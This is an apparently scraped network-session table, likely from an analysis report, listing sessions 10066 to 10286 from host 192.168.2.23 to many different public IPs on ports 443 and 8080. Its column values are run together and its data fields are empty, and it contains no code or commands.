                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10066192.168.2.235486037.26.80.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10067192.168.2.233583434.225.83.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10068192.168.2.235833674.228.91.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10069192.168.2.234140623.127.116.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10070192.168.2.235946057.208.182.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10071192.168.2.234098294.27.125.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10072192.168.2.2345900157.22.197.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10073192.168.2.2346494132.118.182.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10074192.168.2.235076690.80.42.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10075192.168.2.233390684.47.117.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10076192.168.2.234757418.54.122.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10077192.168.2.2338938141.141.138.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10078192.168.2.2334176206.130.114.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10079192.168.2.235539679.202.196.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10080192.168.2.2338146153.92.244.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10081192.168.2.2343780216.211.87.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10082192.168.2.233547617.76.105.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10083192.168.2.2333706176.103.233.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10084192.168.2.2344110219.254.58.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10085192.168.2.233957454.229.6.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10086192.168.2.235961282.117.115.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10087192.168.2.2344186185.99.85.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10088192.168.2.2336970171.55.180.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10089192.168.2.2347058181.114.15.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10090192.168.2.2359772174.85.77.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10091192.168.2.2352888128.22.165.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10092192.168.2.2344508223.19.249.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10093192.168.2.234957831.233.85.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10094192.168.2.2359864185.227.27.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10095192.168.2.2337234217.216.39.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10096192.168.2.2343580117.176.63.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10097192.168.2.234557048.135.209.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10098192.168.2.233904852.89.53.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10099192.168.2.233299027.232.246.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10100192.168.2.2351672114.51.93.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10101192.168.2.2355936129.51.254.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10102192.168.2.2340618164.69.192.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10103192.168.2.235336042.131.239.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10104192.168.2.235461076.110.172.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10105192.168.2.234714845.77.27.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10106192.168.2.234729480.106.135.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10107192.168.2.2339322154.93.229.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10108192.168.2.2360726126.64.175.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10109192.168.2.2337810178.33.150.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10110192.168.2.2338544196.41.62.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10111192.168.2.235435639.125.130.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10112192.168.2.234428443.26.249.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10113192.168.2.2336214217.13.125.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10114192.168.2.2359322195.153.149.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10115192.168.2.2349100187.65.173.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10116192.168.2.234691869.33.127.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10117192.168.2.2342906156.13.179.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10118192.168.2.234312668.66.163.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10119192.168.2.2360682184.214.156.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10120192.168.2.2341340142.84.143.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10121192.168.2.233348236.122.63.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10122192.168.2.2338668110.78.221.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10123192.168.2.2342520141.133.193.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10124192.168.2.2342880170.124.30.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10125192.168.2.2347466216.122.211.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10126192.168.2.2340358209.216.163.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10127192.168.2.235663412.11.10.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10128192.168.2.2335206141.154.183.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10129192.168.2.2344490162.44.160.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10130192.168.2.234582054.44.47.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10131192.168.2.233517859.124.110.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10132192.168.2.2344452171.102.145.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10133192.168.2.2353056218.154.107.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10134192.168.2.2339858218.189.70.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10135192.168.2.234426451.237.36.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10136192.168.2.2338898155.29.20.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10137192.168.2.233901677.86.108.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10138192.168.2.2343208172.226.111.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10139192.168.2.234644673.187.185.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10140192.168.2.235387044.154.229.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10141192.168.2.2353388153.49.218.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10142192.168.2.233576032.22.130.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10143192.168.2.233406498.130.210.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10144192.168.2.2343672113.193.22.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10145192.168.2.2347336116.234.97.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10146192.168.2.2344878139.109.254.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10147192.168.2.2359588140.104.31.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10148192.168.2.2352750124.2.87.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10149192.168.2.23495525.37.246.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10150192.168.2.2356306211.68.39.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10151192.168.2.235590637.154.241.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10152192.168.2.234621483.160.130.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10153192.168.2.2350100106.23.125.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10154192.168.2.234151878.210.191.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10155192.168.2.233529817.255.61.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10156192.168.2.2359160206.164.126.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10157192.168.2.2338250113.167.54.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10158192.168.2.2338790213.41.120.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10159192.168.2.233819658.137.105.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10160192.168.2.2343322164.7.157.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10161192.168.2.235609618.37.255.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10162192.168.2.235625641.90.174.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10163192.168.2.2348562158.83.36.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10164192.168.2.2360494125.39.93.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10165192.168.2.2337080201.173.117.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10166192.168.2.2353088135.226.182.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10167192.168.2.2345822141.223.242.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10168192.168.2.2354172177.85.231.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10169192.168.2.2357606119.223.90.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10170192.168.2.235272692.221.60.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10171192.168.2.235251476.255.30.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10172192.168.2.2360528101.46.195.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10173192.168.2.2339022129.21.169.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10174192.168.2.236079458.139.35.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10175192.168.2.2354474105.176.202.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10176192.168.2.234362852.45.180.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10177192.168.2.2345416193.247.254.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10178192.168.2.235897277.99.100.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10179192.168.2.23502742.171.215.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10180192.168.2.235232274.91.43.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10181192.168.2.2359904219.127.187.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10182192.168.2.234660840.159.250.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10183192.168.2.2342368210.153.225.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10184192.168.2.234759083.189.81.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10185192.168.2.2344304213.73.184.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10186192.168.2.234724423.235.188.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10187192.168.2.2341972148.81.137.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10188192.168.2.235709097.200.118.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10189192.168.2.2336330110.94.8.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10190192.168.2.2355876205.61.103.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10191192.168.2.2347176197.222.158.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10192192.168.2.2355034141.2.187.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10193192.168.2.235914232.199.73.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10194192.168.2.2354108106.95.190.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10195192.168.2.234704417.225.175.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10196192.168.2.2350184203.96.54.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10197192.168.2.2346084209.200.241.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10198192.168.2.2353870213.62.155.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10199192.168.2.2339134138.154.200.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10200192.168.2.234285834.149.5.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10201192.168.2.233835859.6.118.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10202192.168.2.2333448172.204.174.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10203192.168.2.235518699.231.115.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10204192.168.2.2355646189.170.228.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10205192.168.2.2336000197.108.94.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10206192.168.2.234983461.135.225.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10207192.168.2.2351704145.38.80.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10208192.168.2.2335638166.144.44.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10209192.168.2.234404684.124.176.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10210192.168.2.2352188157.202.128.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10211192.168.2.2335668173.164.124.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10212192.168.2.2338200145.134.206.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10213192.168.2.235252843.172.39.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10214192.168.2.235002213.184.51.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10215192.168.2.2339808220.194.211.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10216192.168.2.2354622176.96.217.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10217192.168.2.2340420110.124.52.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10218192.168.2.234592488.195.68.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10219192.168.2.2349670220.230.75.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10220192.168.2.235616872.184.172.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10221192.168.2.2342332175.110.216.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10222192.168.2.2355942180.154.94.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10223192.168.2.233822819.255.213.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10224192.168.2.2354960121.127.85.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10225192.168.2.233327083.102.68.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10226192.168.2.2358020197.75.90.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10227192.168.2.2349108162.219.152.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10228192.168.2.23567402.32.152.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10229192.168.2.234732617.53.252.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10230192.168.2.2344122176.246.48.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10231192.168.2.23330504.71.1.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10232192.168.2.23336504.50.154.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10233192.168.2.2355430112.116.10.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10234192.168.2.2352012193.95.86.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10235192.168.2.235181492.126.24.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10236192.168.2.2350098107.14.29.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10237192.168.2.235013292.65.76.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10238192.168.2.2337020124.37.3.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10239192.168.2.2353266115.3.159.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10240192.168.2.233417644.82.80.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10241192.168.2.235067095.183.8.1388080
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10242192.168.2.234244234.43.145.2388080
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10243192.168.2.2354538103.143.138.918080
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10244192.168.2.236096489.10.5.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10245192.168.2.2356486151.31.52.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10246192.168.2.2356742197.2.197.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10247192.168.2.2334866193.39.88.1528080
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10248192.168.2.2347256191.61.171.1348080
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10249192.168.2.235841224.200.4.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10250192.168.2.2342286216.76.130.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10251192.168.2.233944676.21.47.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10252192.168.2.2333764134.249.39.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10253192.168.2.23521905.22.87.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10254192.168.2.23576325.131.153.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10255192.168.2.2352944100.152.237.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10256192.168.2.234282879.122.41.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10257192.168.2.23333405.132.201.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10258192.168.2.234368817.227.182.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10259192.168.2.233423272.33.68.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10260192.168.2.2349062209.224.221.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10261192.168.2.2350990206.70.39.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10262192.168.2.2352346207.248.127.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10263192.168.2.23516605.70.169.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10264192.168.2.2360084125.233.216.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10265192.168.2.233945062.36.20.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10266192.168.2.234994643.74.163.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10267192.168.2.233578895.145.99.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10268192.168.2.2340074115.246.179.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10269192.168.2.2350960158.71.254.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10270192.168.2.2357214146.182.104.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10271192.168.2.2355862191.192.192.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10272192.168.2.234442889.140.179.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10273192.168.2.2354310196.42.212.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10274192.168.2.2337070143.27.205.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10275192.168.2.2347744205.165.236.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10276192.168.2.234140261.239.43.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10277192.168.2.234810099.56.124.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10278192.168.2.2335994201.79.72.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10279192.168.2.2355514113.242.13.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10280192.168.2.2348908169.81.133.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10281192.168.2.233995679.7.92.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10282192.168.2.233885024.219.117.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10283192.168.2.234948265.201.1.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10284192.168.2.234417237.193.33.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10285192.168.2.2342498151.31.91.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10286192.168.2.233367624.128.184.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
